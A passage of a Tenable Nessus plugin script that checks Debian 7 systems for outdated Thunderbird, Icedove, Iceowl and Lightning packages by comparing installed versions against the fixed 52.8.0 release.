value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-sv-se\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-ta-lk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-zh-cn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-l10n-zh-tw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-bn-bd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-dsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-en-gb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-es-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-es-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-fy-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ga-ie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-hsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-hy-am\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-kab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-nb-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-nn-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-pa-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-pt-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-pt-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-sv-se\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-ta-lk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-zh-cn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lightning-l10n-zh-tw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-bn-bd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-dsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-en-gb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-es-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-es-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-fy-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ga-ie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-hsb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-hy-am\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-kab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-nb-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-nn-no\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-pa-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-pt-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-pt-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-sv-se\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-ta-lk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-zh-cn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird-l10n-zh-tw\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"calendar-google-provider\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dbg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dev\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-all\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ast\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-be\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-bg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-bn-bd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ca\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-cs\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-da\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-de\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-dsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-el\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-en-gb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-es-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-es-es\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-et\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-eu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-fi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-fr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-fy-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ga-ie\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-gd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-gl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-he\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-hr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-hsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-hu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-hy-am\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-id\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-is\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-it\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ja\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-kab\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ko\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-lt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-nb-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-nn-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-pa-in\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-pl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-pt-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-pt-pt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-rm\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ro\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ru\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-si\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-sk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-sl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-sq\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-sr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-sv-se\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-ta-lk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-tr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-uk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-vi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-zh-cn\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-l10n-zh-tw\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-extension\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ast\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-be\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-bg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-bn-bd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ca\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-cs\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-cy\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-da\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-de\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-dsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-el\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-en-gb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-es-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-es-es\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-et\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-eu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-fi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-fr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-fy-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ga-ie\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-gd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-gl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-he\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-hr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-hsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-hu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-hy-am\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-id\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-is\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-it\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ja\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-kab\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ko\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-lt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-nb-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-nn-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-pa-in\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-pl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-pt-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-pt-pt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-rm\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ro\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ru\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-si\", 